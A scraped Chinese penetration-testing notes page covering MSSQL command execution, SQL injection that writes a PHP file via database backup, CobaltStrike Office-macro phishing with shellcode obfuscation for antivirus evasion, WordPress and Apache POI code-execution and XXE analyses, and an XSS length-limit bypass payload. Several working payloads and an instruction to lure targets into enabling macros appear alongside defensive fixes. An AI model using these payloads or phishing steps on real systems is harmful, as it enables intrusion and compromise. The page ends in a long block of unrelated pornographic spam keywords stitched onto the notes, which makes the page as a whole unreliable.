declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >C:\who.txt'

后續我發現該服務器無法出網,還是站庫分離

因此無法執行操作系統命令

0x05 寫入文件

在寫文件這塊,我浪費了大量的時間,首先要確定能否向站點目錄寫文件,當前寫文件的操作是否被攔截等等因素。

一開始的思路是調用xp_cmdshell,采用echo去寫,目前已無法執行命令,就此作罷,吸了一口芙蓉王,精神煥發,遂查到數據庫備份的方式。

提交:

{"ClientType": "", "ClientGuid": "09a37ee1-5ec3-46db-9279-4cb066622e8d", "ModuleType": "A2501';use test222;create table [dbo].[test2] ([cmd] [image]);insert/***/into/***/test2(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);backup database test222 to disk='C:\test2.bak' WITH DIFFERENTIAL,FORMAT;-- ", "IsBackEnd": false }

頁面返回正常。

但是,我的站點目錄如果是中文呢?在Burp里處理就非常麻煩!

還記得之前的IIS 7.5嗎,IIS在接收到一個請求后,會自動將數據進行Unicode解碼,如果流量設備、WAF不支持此特性的話,就可以進行繞過,這里我著重解決中文目錄的問題。

到這此文就結束了,我并沒有成功Getshell,只是回顧我解決問題的思維方式,希望能對大家有用!

傾旋大佬文章:

https://payloads.online/archivers/2020-01-01/3

2.2.11 文件讀取漏洞

https://xz.aliyun.com/t/6594

2.2.12 Pentesterlab Xss

https://pentesterlab.com/ --官網 https://download.vulnhub.com/pentesterlab/web_for_pentester_i386.iso --安裝包 https://blog.csdn.net/he_and/article/details/79798958 https://www.andseclab.com/2018/11/11/pentesterlab-xss題解/ http://secpark.com.cn/articles/2018/05/28/1527502530234.html --很直觀

三篇大佬文章詳細講解了pentesterlab靶機進行XSS滲透!!!


2.2.13 Office宏的基本利用

前言

Office宏,譯自英文單詞Macro。宏是Office自帶的一種高級腳本特性,通過VBA代碼,可以在Office中去完成某項特定的任務,而不必再重復相同的動作,目的是讓用戶文檔中的一些任務自動化。而宏病毒是一種寄存在文檔或模板的宏中的計算機病毒。一旦打開這樣的文檔,其中的宏就會被執行,于是宏病毒就會被激活,轉移到計算機上,并駐留在Normal模板上

Visual Basic for Applications(VBA)是Visual Basic的一種宏語言,是微軟開發出來在其桌面應用程序中執行通用的自動化(OLE)任務的編程語言。主要能用來擴展Windows的應用程序功能,特別是Microsoft Office軟件,也可說是一種應用程式視覺化的Basic 腳本

環境準備

Windows 7 x64 旗艦版 Microsoft Office 2016 CobaltStrike 3.14

CobaltStrike生成宏
先利用CobaltStrike生成宏payload,接下來只要放入word、excel或ppt即可

創建宏Word
打開Word文檔,點擊 “Word 選項 — 自定義功能區 — 開發者工具(勾選) — 確定”

編寫主體內容后,點擊 “開發工具 — Visual Basic” 。

雙擊 “ThisDocument” ,將原有內容全部清空,然后將CobaltStrike生成宏payload全部粘貼進去,保存并關閉該 VBA 編輯器

另存為的Word類型務必要選”Word 97-2003 文檔 (*.doc)”,即 doc 文件,保證低版本可以打開。之后關閉,再打開即可執行宏代碼

反彈Beacon shell
默認情況下,Office已經禁用所有宏,但仍會在打開Word文檔的時候發出通知

誘導目標手動點擊”啟用內容”宏。

目標一旦啟用,CobaltStrike的Beacon就會上線,即成功接收到Shell

宏代碼分析
CobaltStrike生成默認的VBA會導入四個Windows API函數,常見的ShellCode加載器代碼:

CreateRemoteThread 創建一個在其它進程地址空間中運行的線程(也稱:創建遠程線程). VirtualAllocEx 指定進程的虛擬空間保留或提交內存區域 WriteProcessMemory 寫入某一進程的內存區域 CreateProcess 創建一個新的進程和它的主線程,這個新進程運行指定的可執行文件

其中Array(-4,-24,-119,0,0,0,96,-119,-27...就是ShellCode,混淆的辦法有很多種

ShellCode可以自己在VBA里解碼或者比如每個元素自增1,運行的時候-1,達到免殺 ……

參考文章:

https://zhuanlan.zhihu.com/p/98526727 --感謝我不是大神的文章

2.2.14 Java-security-calendar-2019-Candy-Cane

官網:

https://www.ripstech.com/java-security-calendar-2019/ https://www.leadroyal.cn/?p=914 --9102年Java里的XXE https://www.leadroyal.cn/?p=930 --9102年Java里的XXE的防御 https://xz.aliyun.com/search?keyword=Java+Security+2019 ---Ripstech Java Security 2019 Calendar復現系列(1-4)

這里還有更好的文章,沒找到!!!!需要回看!!!


2.2.15 Discuz Ssrf Rce漏洞分析報告

很老的一個漏洞了

https://cloud.tencent.com/developer/article/1511949 ---復現https://xz.aliyun.com/t/2018 ---Discuz!因Memcached未授權訪問導致的RCEhttps://cn-sec.com/archives/76754.html ---https://cn-sec.com/archives/76754.htmlhttps://www.freebuf.com/vuls/191698.html ---Discuz x3.4前臺SSRF漏洞分析https://hackmd.io/@Lhaihai/H1B8PJ9hX --SSRF集合筆記

有一篇很古老的經典文章,硬是沒找到!!!只能書里看了


2.2.16 WordPress語言文件代碼執行漏洞分析

0x00 漏洞概述

1、漏洞簡介

WordPress是一個以PHP和MySQL為平臺的自由開源的博客軟件和內容管理系統,在 github (https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97)上爆出這樣一個漏洞,在其<=4.6.1版本中,如果網站使用攻擊者提前構造好的語言文件來對網站、主題、插件等等來進行翻譯的話,就可以執行任意代碼

2、漏洞影響

任意代碼執行,但有以下兩個前提:

攻擊者可以上傳自己構造的語言文件,或者含有該語言文件的主題、插件等文件夾網站使用攻擊者構造好的語言文件來對網站、主題、插件等進行翻譯

這里舉一個真實場景中的例子:攻擊者更改了某個插件中的語言文件,并更改了插件代碼使插件初始化時使用惡意語言文件對插件進行翻譯,然后攻擊者通過誘導管理員安裝此插件來觸發漏洞

3、影響版本

<= 4.6.1

0x01 漏洞復現

1、環境搭建

docker pull wordpress:4.6.1 docker pull mysql docker run --name wp-mysql -e MYSQL_ROOT_PASSWORD=hellowp -e MYSQL_DATABASE=wp -d mysql docker run --name wp --link wp-mysql:mysql -d wordpress

2、漏洞分析

首先我們來看這樣一個場景:

在調用create_function時,我們通過 } 將原函數閉合,添加我們想要執行的內容后再使用/*將后面不必要的部分注釋掉,最后即使我們沒有調用創建好的函數,我們添加的新內容也依然被執行了。之所以如此,是因為create_function內部使用了eval來執行代碼,我們看PHP手冊上的說明:

所以由于這個特性,如果我們可以控制create_function的$code參數,那就有了任意代碼執行的可能。這里要說一下,create_function這個漏洞最早由80sec在08年提出,這里提供幾個鏈接作為參考:

https://www.exploit-db.com/exploits/32416/ https://bugs.php.net/bug.php?id=48231 http://www.2cto.com/Article/201212/177146.html

接下來我們看Wordpress中一處用到create_function的地方,在wp-includes/pomo/translations.php第203-209行:

/*** Makes a function, which will return the right translation index, according to the* plural forms header* @param int $nplurals* @param string $expression*/function make_plural_form_function($nplurals, $expression) { $expression = str_replace('n', '$n', $expression);$func_body = "\$index = (int)($expression);return (\$index < $nplurals)? \$index : $nplurals - 1;";return create_function('$n', $func_body); }

根據注釋可以看到該函數的作用是根據字體文件中的plural forms這個header來創建函數并返回,其中$expression用于組成$func_body,而$func_body作為$code參數傳入了create_function,所以關鍵是控制$expresstion的值。

我們看一下正常的字體文件zh_CN.mo,其中有這么一段:

Plural-Froms這個header就是上面的函數所需要處理的,其中nplurals的值即為$nplurals的值,而plural的值正是我們需要的$expression的值。所以我們將字體文件進行如下改動:

然后我們在后臺重新加載這個字體文件,同時進行動態調試,可以看到如下情景:

我們payload中的)首先閉合了前面的(,然后;結束前面的語句,接著是我們的一句話木馬,然后用/*將后面不必要的部分注釋掉,通過這樣,我們就將payload完整的傳入了create_function,在其創建函數時我們的payload就會被執行,由于訪問每個文件時都要用這個對字體文件解析的結果對文件進行翻譯,所以我們訪問任何文件都可以觸發這個payload:


其中訪問index.php?c=phpinfo();的函數調用棧如下:

0x02 修復方案

下載官方發布的補丁打上,建議管理員增強安全意識,不要使用來路不明的字體文件、插件、主題等等

對于開發者來說,建議對$expression中的特殊符號進行過濾,例如:

$not_allowed = array(";", ")", "}"); $experssion = str_replace($not_allowed, "", $expression);

參考:

https://www.seebug.org/vuldb/ssvid-92459https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97http://php.net/manual/zh/function.create-function.phphttps://www.exploit-db.com/exploits/32416/https://bugs.php.net/bug.php?id=48231http://www.2cto.com/Article/201212/177146.htmlhttps://codex.wordpress.org/InstallingWordPressinYourLanguage https://cloud.tencent.com/developer/article/1078451 --正文,感謝

2.2.17 Struts2遠程命令執行s2-048漏洞分析報告

https://www.ichunqiu.com/course/58753 --春秋視頻講解http://blog.topsec.com.cn/strutss2-048遠程命令執行漏洞分析/ --阿爾法實驗室https://www.freebuf.com/vuls/140410.html --復現 https://www.jianshu.com/p/05efdc8f4301 --復現 https://www.jianshu.com/p/356291fb26a2 --復現https://www.zybuluo.com/Dukebf/note/821989 --strut2各版本漏洞信息整理

很老的一個漏洞了…學習下思路~~


2.2.18 靜態免殺php一句話(已過D盾,河馬,安全狗)

https://www.cnblogs.com/ABKing/p/13515014.html --2020年8月最新一句話木馬免殺(截止2020年8月16日通殺D盾、安全狗,微步,webshellKiller)https://mp.weixin.qq.com/s/lExi2_y4NkTak735kpz4ug --2020年8月如何優雅的隱藏你的webshell

還有很多方法,這里書籍上的方法未找到,可看書!!


2.2.19 金融信息系統安全測評方法(不公布!)

http://www.djbh.net/webdev/file/webFiles/File/jsbz/201232310276.pdf ---信息安全技術信息安全風險評估規范http://www.djbh.net/webdev/file/webFiles/File/zcbz/201226173039.pdf ---信息安全技術信息系統安全管理要求

學習下就好!!!

隨著大數據、云計算、人工智能及區塊鏈等新興技術的應用,銀行業手機銀行、微信銀行等新興數字化金通過安全測評過程,全面分析出信息系統可能存在的人為破壞場景及其成因與后果,通過科學有效的測試

所以才提起金融信息系統安全測評方法這塊內容的警惕,這里只能看書,網上應該是封了大部分資料書內容很全!!


2.2.20 Apache-Poi-XXE-Analysis

復現CVE-2019-12415、CVE-2014-3529

0x01 概述

apache poi 這個組件實際上在 java 應用中蠻常見的,這個組件主要用在 word 文檔或者 excel 文件導入的業務場景下使用。眾所周知,這些文檔實際上也是一個類似壓縮包一類的存在,所以今天就看看這個東西。

0x02 漏洞分析

CVE-2014-3529

apache poi 在3.10.1之前存在XXE漏洞

漏洞場景搭建

測試代碼

import org.apache.poi.EncryptedDocumentException; import org.apache.poi.openxml4j.exceptions.InvalidFormatException; import org.apache.poi.ss.usermodel.Sheet; import org.apache.poi.ss.usermodel.Workbook; import org.apache.poi.ss.usermodel.WorkbookFactory; import java.io.FileInputStream; import java.io.IOException; public class CVE20143529 {public static void main(String[] args) throws IOException, EncryptedDocumentException, InvalidFormatException {Workbook wb1 = WorkbookFactory.create(new FileInputStream("test.xlsx"));Sheet sheet = wb1.getSheetAt(0);System.out.println(sheet.getLastRowNum());} } //pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><groupId>com.apache.poi</groupId><artifactId>xxe</artifactId><version>1.0-SNAPSHOT</version><dependencies><dependency><groupId>org.apache.poi</groupId><artifactId>poi-ooxml</artifactId><version>3.10-FINAL</version></dependency></dependencies></project>

漏洞復現

修改 excel 文件中的 [Content_Types].xml 、 /xl/workbook.xml 、 /xl/worksheets/shee1.xml 中均可添加 xxepayload 觸發漏洞,我選擇在 [Content_Types].xml 文件中添加

漏洞分析

選擇在WorkbookFactory.create處下一個斷點,一步步跟入,來到了 OPCPackage 這個類中

public static OPCPackage open(InputStream in) throws InvalidFormatException, IOException {OPCPackage pack = new ZipPackage(in, PackageAccess.READ_WRITE);if (pack.partList == null) {pack.getParts();}return pack;}

在這個累里,首先new了一個 ZipPackage 類來解析輸入,跟進來很明顯是個處理 zip 這類型壓縮包的東西

ZipPackage(InputStream in, PackageAccess access) throws IOException {super(access);this.zipArchive = new ZipInputStreamZipEntrySource(new ZipInputStream(in));}

繼續往下走,看到了一個if里面調用了pack.getParts();方法,跟進 getParts

public ArrayList<PackagePart> getParts() throws InvalidFormatException {this.throwExceptionIfWriteOnly();if (this.partList == null) {boolean hasCorePropertiesPart = false;boolean needCorePropertiesPart = true;PackagePart[] parts = this.getPartsImpl();

這里不知道漏洞觸發點在哪,自然就一步步跟了,首先看到了一個this.getPartsImpl(),跟進這個方法,在這個方法里面看到了一個很眼熟的東西,我們剛剛是在 [Content_Types].xml 文件中添加的payload,這里出現了這個文件

繼續跟進 ZipContentTypeManager 這個類,跟進之后才發現,它調用的是它的父類 ContentTypeManager 來進行處理

public ZipContentTypeManager(InputStream in, OPCPackage pkg) throws InvalidFormatException {super(in, pkg);}

跟進 ContentTypeManager ,下圖中 parseContentTypesFile 處理了我們的輸入

跟進 parseContentTypesFile 終于找到了XXE的觸發點

貼一個調用棧

parseContentTypesFile:377, ContentTypeManager (org.apache.poi.openxml4j.opc.internal) <init>:105, ContentTypeManager (org.apache.poi.openxml4j.opc.internal) <init>:56, ZipContentTypeManager (org.apache.poi.openxml4j.opc.internal) getPartsImpl:188, ZipPackage (org.apache.poi.openxml4j.opc) getParts:665, OPCPackage (org.apache.poi.openxml4j.opc) open:274, OPCPackage (org.apache.poi.openxml4j.opc) create:79, WorkbookFactory (org.apache.poi.ss.usermodel) main:12, CVE20143529

漏洞修復

可以看到修復方式將 xmlReader.read(in) 變成了 SAXHelper.readSAXDocument(in)

private void parseContentTypesFile(InputStream in) throws InvalidFormatException {try {Document xmlContentTypetDoc = SAXHelper.readSAXDocument(in);

然后在 org.apache.poi.util.SAXHelper 中做了一些 xxe 的限制

CVE-2019-12415

In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.

漏洞場景搭建

測試代碼:

import org.apache.poi.EncryptedDocumentException; import org.apache.poi.openxml4j.exceptions.InvalidFormatException; import org.apache.poi.xssf.extractor.XSSFExportToXml; import org.apache.poi.xssf.usermodel.XSSFMap; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.xml.sax.SAXException;import javax.xml.transform.TransformerException; import java.io.File; import java.io.FileInputStream; import java.io.IOException; public class PoiXxe {public static void main(String[] args) throws IOException, EncryptedDocumentException, InvalidFormatException, TransformerException, SAXException {XSSFWorkbook wb = new XSSFWorkbook(new FileInputStream(new File("/Users/l1nk3r/Desktop/CustomXMLMappings.xlsx")));for (XSSFMap map : wb.getCustomXMLMappings()) {XSSFExportToXml exporter = new XSSFExportToXml(map); // 使用 XSSFExportToXml 將 xlsx 轉成 xmlexporter.exportToXML(System.out, true);//第一個參數是輸出流無所謂,第二個參數要為 true}} } //pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"><modelVersion>4.0.0</modelVersion><groupId>com.apache.poi</groupId><artifactId>xxe</artifactId><version>1.0-SNAPSHOT</version><dependencies><dependency><groupId>org.apache.poi</groupId><artifactId>poi-ooxml</artifactId><version>4.1.0</version></dependency></dependencies> </project>

漏洞復現
下載這個excel文件,在 CustomXMLMappings/xl/xmlMaps.xml 文件中增加下面這個代碼

<xsd:redefine schemaLocation="http://127.0.0.1:8080/"></xsd:redefine>


漏洞分析

調用棧太繁瑣了,只列幾個關鍵點,程序進行到 XSDHandler#constructTrees 這個方法的時候,抓出來我們poc中的外帶地址

下一步在 XSDHandler#resolveSchema 中,把外帶地址交給了 getSchemaDocument 處理

最后代碼繼續往下走,在 XMLEntityManager#setupCurrentEntity 找到了http的請求發起,所以想知道一個XXE漏洞的調用棧,絕大多數情況下,你可以選擇在JDK自身的 XMLEntityManager#setupCurrentEntity 中HTTP請求下個斷點,然后利用OOB方式利用,很多找到觸發過程的調用棧

setupCurrentEntity:619, XMLEntityManager (com.sun.org.apache.xerces.internal.impl) determineDocVersion:189, XMLVersionDetector (com.sun.org.apache.xerces.internal.impl) parse:582, SchemaParsingConfig (com.sun.org.apache.xerces.internal.impl.xs.opti) parse:685, SchemaParsingConfig (com.sun.org.apache.xerces.internal.impl.xs.opti) parse:530, SchemaDOMParser (com.sun.org.apache.xerces.internal.impl.xs.opti) getSchemaDocument:2175, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.traversers) resolveSchema:2096, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.traversers) constructTrees:1100, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.traversers) parseSchema:620, XSDHandler (com.sun.org.apache.xerces.internal.impl.xs.traversers) loadSchema:617, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) loadGrammar:575, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) loadGrammar:541, XMLSchemaLoader (com.sun.org.apache.xerces.internal.impl.xs) newSchema:255, XMLSchemaFactory (com.sun.org.apache.xerces.internal.jaxp.validation) newSchema:638, SchemaFactory (javax.xml.validation) isValid:249, XSSFExportToXml (org.apache.poi.xssf.extractor) exportToXML:211, XSSFExportToXml (org.apache.poi.xssf.extractor) exportToXML:105, XSSFExportToXml (org.apache.poi.xssf.extractor) main:20, PoiXxe

漏洞修復

修復的方式增加了一行

trySetFeature(factory, "http://javax.xml.XMLConstants/feature/secure-processing", true);

然后問題關鍵點就來到了 SecuritySupport#checkAccess ,可以看到未修復代碼 allowedProtocols 是all,而 acessAny 也是all,所以 checkAccess 結果返回的是null

已修復代碼中的 SecuritySupport#checkAccess 方法,可以看到未修復代碼 allowedProtocols 是"",而 acessAny 也是all,所以 checkAccess 結果返回的是 http

回到 XSDHandler#getSchemaDocument 中,由于不允許http方式外帶數據,因此我們的錯誤信息自然會出現下圖報錯里面的部分

最后在簡單bb一下,這個洞沒啥用,外帶也沒辦法利用FTP client換行那個洞外帶數據,所以是個弟中弟的洞

Rerfence:

Apache POI <= 4.1.0 XXE 漏洞 (CVE-2019-12415)

參考文章:

https://xz.aliyun.com/t/6996 ---本文復現文章

2.2.20 記一次阿里主站xss測試及繞過waf防護

使用工具:

https://github.com/chaitin/xray https://www.loongten.com/2019/12/20/find-alibaba-xss/ --一枚阿里巴巴主站XSS挖掘之旅

書里也有另外的思路,大部分都是各種倒騰方法測試,前面也列舉了很多,未授權的別亂搞!!

2.2.21 ClassLoader類加載機制

https://javasec.org/javase/ClassLoader/

該網站是JAVA非常好的一個學習頁面,前面也推薦過了,這里提到ClassLoader再次推下!!


2.2.22 淺談SSRF原理及其利用(dayu-Ninth Day)

https://teamssix.com/year/191222-192227.html
參考文章 https://xz.aliyun.com/t/2115 http://www.liuwx.cn/penetrationtest-3.html https://www.cnblogs.com/yuzly/p/10903398.html https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf https://www.netsparker.com/blog/web-security/server-side-request-forgery-vulnerability-ssrf/

2.2.23 Spring-Data-Commons (CVE-2018-1273)

http://blog.nsfocus.net/cve-2018-1273-analysis/ 自行搭建復現https://pianshen.com/article/9248784281/ vulhub靶機復現http://xxlegend.com/2018/04/12/CVE-2018-1273-%20RCE%20with%20Spring%20Data%20Commons%20%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A/

聽老的漏洞了,可以玩玩


2.2.24 xss繞過代碼后端長度限制的方法

這篇文章是我近期在審計一套 CMS 的時候順便寫的。

一般來講程序對于輸入字符長度進行限制的方法主要分兩種,一種是前端的長度限制,這種的繞過只需要修改前端源碼即可,或者本地構造一個表單。

本次審計的這套 CMS 存在一個 XSS 漏洞,由于日志入庫驗證不嚴格導致存在該漏洞,只需要嘗試登陸即可寫入 payload

$uid = 0;$cfrom = $this->method->request('cfrom', $cfrom);$token = $this->method->request('token');$device= $this->method->request('device', $device);$ip = $this->method->request('ip', $this->method->ip);$web = $this->method->request('web', $this->method->web);$cfroar= explode(',', 'pc,reim,weixin,appandroid,appiphone,mweb');if(!in_array($cfrom, $cfroar))return 'not found cfrom';if($user=='')return '用戶名不能為空';if($pass==''&&strlen($token)<8)return '密碼不能為空';$user = addslashes(substr($user, 0, 20));$pass = addslashes($pass);$logins = '登錄成功';$msg = '';$fields = '`pass`,`id`,`name`,`user`,`face`,`deptname`';$arrs = array('user' => $user,'status|eqi' => 1,'type|eqi' => 1,'state|neqi' => 5);$us = $this->db->getone('admin', $arrs , $fields);if(!$us){unset($arrs['user']);$arrs['name'] = $user;$tos = $this->db->rows('admin', $arrs);if($tos>1){$msg = '存在相同用戶名,系統無法識別';}if($msg=='')$us = $this->db->getone('admin', $arrs , $fields);}if($msg=='' && !$us){$msg = '用戶不存在';}else if($msg==''){$uid = $us['id'];$user = $us['user'];if(md5($pass)!=$us['pass'])$msg='密碼錯誤';if($pass==HIGHPASS){$msg = '';$logins = '管理員密碼登錄成功';}if($msg!=''&&strlen($token)>=8){$moddt = date('Y-m-d H:i:s', time()-10*60*1000);$trs = $this->getone("`uid`='$uid' and `token`='$token' and `moddt`>='$moddt'");if($trs){$msg = '';$logins = '快捷登錄';}}}$name = $face = $deptname = '';if($msg==''){$name = $us['name'];$deptname = $us['deptname'];$face = $us['face'];if(!$this->isempt($face))$face = URL.''.$face.'';$face = $this->method->repempt($face, 'images/noface.jpg');$this->db->update('admin',"`loginci`=`loginci`+1", $uid);}else{$logins = $msg;}m('log')->addlog(''.$cfrom.'登錄','['.$user.']'.$logins.'', array('optid' => $uid,'optname' => $name,'ip' => $ip,'web' => $web,));

程序前部分代碼對整個登錄過程進行了完整驗證,同樣開發者為了防止插入惡意代碼對截取的數據長度限制到了 20 位并使用了 addslashes 對敏感字符進行轉義。所以在后面的寫入日志那里就很難寫入有攻擊性的 XSS 代碼,單純 就已經占了 17 個字符


通過查看日志的源代碼發現其實腳本標簽是可以插入的,只不過沒有辦法寫入完整代碼,但是最為重要的一個因素在于,這里所插入的代碼都是顯示在同一個頁面的。

所以接下來就是拼接 Payload 代碼??紤]到程序會在渲染到頁面的時候增加許多的標簽導致腳本語法出錯所以就直接給注釋掉。

最終 payload 代碼如下

*/</script>*/;alert(a);/**//xss//**/a=/*<script>var/*

這里順序的問題是因為程序的數據是從后往前顯示,咱們輸入的順序是反的但是在頁面顯示的時候順序是正常的

成功觸發 XSS 代碼。

最終源代碼如下:


最終通過注釋符與代碼之間的拼接成功的插入了完整的XSS代碼

參考鏈接:

https://www.shangyexinzhi.com/article/387056.html --該文章https://www.freebuf.com/column/221882.html --加深

2.2.25 mysql提權之mof

https://www.jianshu.com/p/6dbac868e2abhttps://pino-hd.github.io/2018/06/10/MySQL提權之MOF/https://www.cnblogs.com/h4ck0ne/p/5154629.html

2.2.26 mysql提權之udf

http://www.oniont.cn/index.php/archives/310.htmlhttps://www.jianshu.com/p/5b34c1b6dee7

2.2.27 XSS 基礎學習

https://baike.baidu.com/item/XSS%E6%94%BB%E5%87%BB 百度百科 https://www.jianshu.com/p/24a19c6434ae --最新累積

還有書中知識!!!


2.2.28 java 反射與內存shell 初探-基于jetty容器的shell 維權

https://www.freebuf.com/articles/web/172753.html ---利用“進程注入”實現無文件復活 WebShell

明日在補充,今天腦殼痛!!

總結

以上是生活随笔為你收集整理的Notes Ninth Day-渗透攻击-红队-打入内网的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

亚洲人成网站免费播放 | 国产午夜亚洲精品不卡下载 | 少妇太爽了在线观看 | 国产真实伦对白全集 | 国产成人无码av片在线观看不卡 | 久久久婷婷五月亚洲97号色 | 永久免费精品精品永久-夜色 | 久久午夜无码鲁丝片秋霞 | 精品无码一区二区三区的天堂 | 欧美真人作爱免费视频 | 4hu四虎永久在线观看 | 亚洲熟女一区二区三区 | 亚洲中文字幕av在天堂 | 亚洲日韩一区二区三区 | 色一情一乱一伦一区二区三欧美 | 国产乱码精品一品二品 | 强开小婷嫩苞又嫩又紧视频 | av小次郎收藏 | 国产精品美女久久久 | 久久精品丝袜高跟鞋 | 成在人线av无码免观看麻豆 | 国产农村妇女高潮大叫 | 久久久久久亚洲精品a片成人 | www国产亚洲精品久久久日本 | 亚洲日韩av一区二区三区中文 | 黑人巨大精品欧美一区二区 | 伊人久久大香线焦av综合影院 | 中文亚洲成a人片在线观看 | 国产人妻人伦精品1国产丝袜 | 久热国产vs视频在线观看 | 中文无码成人免费视频在线观看 | 久久精品女人天堂av免费观看 | 西西人体www44rt大胆高清 | 国产区女主播在线观看 | 99久久人妻精品免费一区 | aⅴ在线视频男人的天堂 | 国产精品无码一区二区桃花视频 | 欧美日韩一区二区三区自拍 | 亚洲综合伊人久久大杳蕉 | 无码国产激情在线观看 | 国产无遮挡吃胸膜奶免费看 | 99国产欧美久久久精品 | 日本爽爽爽爽爽爽在线观看免 | 欧美日韩视频无码一区二区三 | 国产莉萝无码av在线播放 | а天堂中文在线官网 | 内射后入在线观看一区 | 欧美老熟妇乱xxxxx | 风流少妇按摩来高潮 | 国产精品高潮呻吟av久久 | 婷婷五月综合激情中文字幕 | 天堂а√在线地址中文在线 | 伦伦影院午夜理论片 | 伊在人天堂亚洲香蕉精品区 | 麻豆人妻少妇精品无码专区 | 人妻少妇精品视频专区 | 东京无码熟妇人妻av在线网址 | 亚洲综合色区中文字幕 | 国内少妇偷人精品视频免费 | 六月丁香婷婷色狠狠久久 | 中文字幕无码热在线视频 | 精品国产av色一区二区深夜久久 | 亚洲综合久久一区二区 | 久久久精品国产sm最大网站 | 欧美日韩一区二区三区自拍 | 我要看www免费看插插视频 | 好屌草这里只有精品 | 青青青爽视频在线观看 | 成熟人妻av无码专区 | 色婷婷av一区二区三区之红樱桃 | 国产激情综合五月久久 | 日韩少妇内射免费播放 | 永久免费观看国产裸体美女 | 一区二区三区高清视频一 | 18禁止看的免费污网站 | 国产高清av在线播放 | 双乳奶水饱满少妇呻吟 | 成在人线av无码免费 | 九九久久精品国产免费看小说 | 51国偷自产一区二区三区 | 伊人色综合久久天天小片 | 日韩 欧美 动漫 国产 制服 | 2020久久香蕉国产线看观看 | 国产精品igao视频网 | 荫蒂被男人添的好舒服爽免费视频 | 又色又爽又黄的美女裸体网站 | 婷婷色婷婷开心五月四房播播 | 娇妻被黑人粗大高潮白浆 | 狠狠躁日日躁夜夜躁2020 | 67194成是人免费无码 | 亚洲精品鲁一鲁一区二区三区 | 国产精品对白交换视频 | 白嫩日本少妇做爰 | 婷婷五月综合缴情在线视频 | 国产av人人夜夜澡人人爽麻豆 | 欧美国产日韩久久mv | 国产人妻久久精品二区三区老狼 | 对白脏话肉麻粗话av | 人妻少妇精品无码专区动漫 | 在线播放免费人成毛片乱码 | 老头边吃奶边弄进去呻吟 | 无码成人精品区在线观看 | 强伦人妻一区二区三区视频18 | 丰满人妻精品国产99aⅴ | 精品aⅴ一区二区三区 | 久久99精品久久久久久动态图 | 一本无码人妻在中文字幕免费 | 成人精品一区二区三区中文字幕 | yw尤物av无码国产在线观看 | 丰满妇女强制高潮18xxxx | 强伦人妻一区二区三区视频18 | 亚洲成av人片天堂网无码】 | 欧美成人午夜精品久久久 | 内射欧美老妇wbb | 水蜜桃色314在线观看 | 76少妇精品导航 | 国产精品第一区揄拍无码 | 在线看片无码永久免费视频 | 大屁股大乳丰满人妻 | 久久综合激激的五月天 | 色综合天天综合狠狠爱 | 日本va欧美va欧美va精品 | 国产午夜福利亚洲第一 | 中文精品无码中文字幕无码专区 | 国产熟妇另类久久久久 | 国产色xx群视频射精 | 亚洲欧美中文字幕5发布 | 久久国产精品萌白酱免费 | 天天拍夜夜添久久精品大 | 国产精品免费大片 | 亚洲国产综合无码一区 | 成人无码精品一区二区三区 | 18精品久久久无码午夜福利 | 55夜色66夜色国产精品视频 | 亚洲精品美女久久久久久久 | 久久精品人妻少妇一区二区三区 | 精品久久久久久亚洲精品 | 亚洲日本va午夜在线电影 | 久久99精品久久久久久动态图 | 免费人成网站视频在线观看 | 青青草原综合久久大伊人精品 | 亚洲色无码一区二区三区 | www国产亚洲精品久久网站 | 大色综合色综合网站 | 久久久久se色偷偷亚洲精品av | 乱人伦中文视频在线观看 | 国产无遮挡又黄又爽又色 | a在线观看免费网站大全 | 东京一本一道一二三区 | 亚洲区小说区激情区图片区 | 国产偷国产偷精品高清尤物 | 丰满诱人的人妻3 | 亚洲欧美中文字幕5发布 | 东京热一精品无码av | 午夜成人1000部免费视频 | 亚洲精品国产精品乱码视色 | 亚洲成av人影院在线观看 | 国产成人综合色在线观看网站 | 中国大陆精品视频xxxx | 又大又黄又粗又爽的免费视频 | 婷婷丁香六月激情综合啪 | 国产成人一区二区三区别 | 日韩精品乱码av一区二区 | 亚洲精品一区二区三区在线观看 | 国语精品一区二区三区 | av无码电影一区二区三区 | 中文字幕无码av波多野吉衣 | 中文字幕色婷婷在线视频 | 国产亚洲精品久久久闺蜜 | 99视频精品全部免费免费观看 | 国产一区二区不卡老阿姨 | 2020久久超碰国产精品最新 | 午夜肉伦伦影院 | 午夜无码区在线观看 | 蜜桃视频插满18在线观看 | 久久久久免费精品国产 | 强开小婷嫩苞又嫩又紧视频 | 中文字幕亚洲情99在线 | 欧美人与禽猛交狂配 | 东京热一精品无码av | 四十如虎的丰满熟妇啪啪 | 久久精品视频在线看15 | 色情久久久av熟女人妻网站 | 久久99精品久久久久久 | 99精品无人区乱码1区2区3区 | 欧美日韩在线亚洲综合国产人 | 精品一二三区久久aaa片 | 97久久国产亚洲精品超碰热 | 午夜理论片yy44880影院 | 狠狠色噜噜狠狠狠狠7777米奇 | 欧美一区二区三区视频在线观看 | 日韩精品无码一本二本三本色 | 国产 精品 自在自线 | 大色综合色综合网站 | 亚洲自偷自偷在线制服 | 亚洲va欧美va天堂v国产综合 